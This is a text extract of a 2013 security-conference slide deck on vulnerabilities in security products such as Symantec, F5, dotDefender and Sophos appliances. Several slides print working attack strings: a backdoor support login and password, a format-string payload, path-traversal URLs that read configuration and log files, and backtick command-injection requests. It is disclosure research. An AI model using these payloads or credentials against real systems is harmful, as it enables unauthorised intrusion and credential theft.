Contenu connexe
Similaire à Alexander Antukh
Similaire à Alexander Antukh (20)
Plus de Positive Hack Days
Plus de Positive Hack Days (20)
Alexander Antukh
- 2. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
2
- 3. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
SEC Consult – Who we are
Canada
India
Singapore
SEC Consult Office
SEC Consult Headquarter
Other SEC Consult Clients
Lithuania
Germany
Austria Central and Easter Europe
• Leading international application
security consultancy
• Founded 2002
• Headquarters near Vienna,
Austria
• Delivery Centers in Austria,
Germany, Lithuania and Singapore
• Strong customer base in Central
and Eastern Europe
• Increasing customer base of clients
with global business (esp. out of
Top-10 US and European software
vendors)
• 35+ application security experts
• Industry focus banks, software
vendors, government
USA
3
- 4. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Alexander Antukh – Whoami
• Security consultant
• Offensive Security Certified Expert
• Defcon Moscow Local Group
Coordinator
*kidhacker
4
- 5. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
5
- 6. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
What is Security Software
“A generic term referring to any computer program or library which
purpose is to (help to) secure a computer system or a computer network”
6
- 7. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
What is Security Software
7
The keyword in all the security software is…
- 8. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
What is Security Software
8
- 9. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
What is Security Software
9
In other words, SS is a piece of “anti-evil” software which makes you feel
safe and “anti-bad”
- 10. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
10
- 11. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Historical review
Evolution:
Packet filter Stateful FW App layer FW
First appearance: 1988
First *registered* exploit: 1995
Objective: control network traffic and
determine if it’s good enough to pass
Firewall
11
- 12. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Historical review
First appearance: 1986
First *registered* hack: 1999
Objective: monitor for malicious
activities or policy violations
(heuristics, signatures...)
ID(P)S
Ceci n‘est pas un firewall...
Statistical anomaly-based
Signature-based
12
Passive (detection)
Reactive (prevention)
- 13. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Historical review
AntiSpam evolution:
Del
First appearance: Monty Python
First PoC: 1978
Industrial scale: 1994 - ...
CAN-SPAM Act of 2003: spam is legal
Keywords Blacklists
Auth Protocol analysis Filtering
13
- 14. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved14
Historical review
First registered hack: 1903
(OSVDB-ID: 79399, 79400)
Anti-sniffing
“… I did it for the lulz”
Today it’s net
configuration, encryption and
IDS/IPS
Nevil Maskelyne
- 15. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved15
Historical review
First „viruses“: 1971
First viruses: mid-1980s
First AVs: mid-1980s (CHK4BOMB,
BOMBSQUAD, DRPROTECT)
Virus evolution:
Benign Destructive $$$$$
Anti-virus
- 16. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved16
Historical review
AV companies don’t stand still…
- 17. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved17
Historical review
… neither do other SS products
- 18. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved18
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterward
• QA
- 19. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved19
The question
Do you know anybody less boring?
What if the SS is vulnerable itself?
- 20. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved20
The answer
*sorry for my English
- 21. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved21
Déjà vu (slide from PHDays 2012)
• Reverse engineering
• Checkpoint – Client side remote command execution
Multiple Checkpoint appliances
CVE-2011-1827
• Fuzzing
• F5 Firepass – Remote command execution
F5 FirePass SSL VPN – Remote command execution
CVE-2012-1777
• Application testing
• Microsoft ASP.Net – Authentication bypass
Microsoft Security Bulletin MS11-100 - Critical
Vulnerabilities in .NET Framework Could Allow Elevation of
Privilege (2638420)
CVE-2011-3416
Security software products will be the target of the trade ... soon !
- 22. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved22
The time has come!
- 23. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
The answer
• Symantec Messaging Gateway
• Backdoor by design
Code execution
• F5 BIG-IP
• SQL Injection, XXE
Passwords… Root access
• Applicure dotDefender WAF
• Format string vulnerability
Code execution
• Sophos Web Protection Appliance
• LFI, OS Command Injection
Command execution, admin account pwn
Security software products are the target of the trade ... already!
23
- 24. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
The answer
“... inbound and outbound messaging security,
with effective and accurate real-time antispam
and antivirus protection, advanced content
filtering, data loss prevention, and email
encryption ...“
Symantec Messaging Gateway
v.9.5.x
SSH?!
Login: support
MD5: 52e3bbafc627009ac13caff1200a0dbf
Password: symantec
24
- 25. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
The answer
F5 BIG-IP <= 11.2.0
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
25
- 26. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
The answer
“... from load balancing and service offloading
to acceleration and security, the BIG-IP system
delivers agility—and ensures your applications
are fast, secure, and available ...“
sam/admin/reports/php/getSettings.php
26
F5 BIG-IP <= 11.2.0
- 27. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
The answer
“... dotDefender is a web application
security solution (a Web Application
Firewall, or WAF) that offers
strong, proactive security for your websites
and web applications ...“
Web Attack?
27
AppliCure dotDefender WAF <= 4.26
- 28. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved28
The answer
• %MAILTO_BLOCK% - email entered in the “Email
address for blocked request report” field
• %RID% - reference ID
• %IP% - server's IP address
• %DATE_TIME% - date of blocked request
Error page can be configured in different ways:
Vars to be added to the body of a custom page:
Looks nice…
AppliCure dotDefender WAF <= 4.26
- 29. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved29
The answer
Format string injection
• Variables
• Buffer
• ...
• AP_PRINTF()
check for format string vulnerabilities
… should be
<%IP%> Host: …
Algorithm:
%666dxBAxADxBExEF…
AppliCure dotDefender WAF <= 4.26
- 30. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved30
The answer
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make
policy administration a snap, even for non-
technical users...“
Sophos Web Protection
Appliance <= 3.7.8.1
https://<host>/cgi-bin/patience.cgi?id=..
?id=../../persist/config/shared.conf%00
?id=../../log/ui_access_log%00
"https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3
c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0)
Gecko/20100101 Firefox/19.0"
Passwords!
- 31. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved31
The answer
` POST /index.php?c=diagnostic_tools HTTP/1.1
...
action=wget§ion=configuration&STYLE=<validsessid>&url=%60sle
ep%205%60
Diagnostic Tools
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make
policy administration a snap, even for non-
technical users...“
Sophos Web Protection
Appliance <= 3.7.8.1
- 32. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved32
The answer
` https://<host>/end-user/index.php?reason=application&client-
ip=%20%60sleep+10%60
Block page (%%user_workstation%%“)
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make
policy administration a snap, even for non-
technical users...“
Sophos Web Protection
Appliance <= 3.7.8.1
- 33. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved33
The answer
POST /index.php?c=local_site_list_editor HTTP/1.1
...
STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'"
,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]
Local Site List
`
“... our award-winning Secure Web Gateway
appliances make web protection easy. They are
quick to setup, simple to manage and make
policy administration a snap, even for non-
technical users...“
Sophos Web Protection
Appliance <= 3.7.8.1
- 34. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved34
The answer
Sophos Web Protection
Appliance <= 3.7.8.1
- 35. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved35
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 36. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Vuln, where art thou?
• Methods for identifying usable bugs in “Software products”
• Applicaton testing and Fuzzing
• Reverse engineering
• Source code analysis
• A short note on so called “security scanning” tools
36
- 37. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Vuln, where art thou?
• The workflow for the appliance analysis is pretty simple!
• get a virtual appliance demo version
• install the appliance
• add the .vmdk to another vm and mount it there (or use a linux fs
driver that can mount vmdk files)
• add a new user to /etc/passwd, or change UID/shell/password of
existing users (or maybe change the sudoers file, sshd config)
• start the appliance again and log in :)
• look at the services that are running (and their configuration)
• pwnage ;)
37
- 38. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
Vuln, where art thou?
*Move two matches to make it three equal squares
38
- 39. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved39
Start me up!
Vuln, where art thou?
- 40. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved40
Agenda
• Introduction
• What is Security Software
• Historical review
• The Question
• The Answer
• Vuln, where art thou?
• Afterword
• QA
- 41. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved41
Sometimes it’s easier to find the vulnerability than it
might be expected . . .
*doesn’t exist yet
And now for something completely different
- 42. © 2013 SEC Consult Unternehmensberatung GmbH – All rights reserved
QA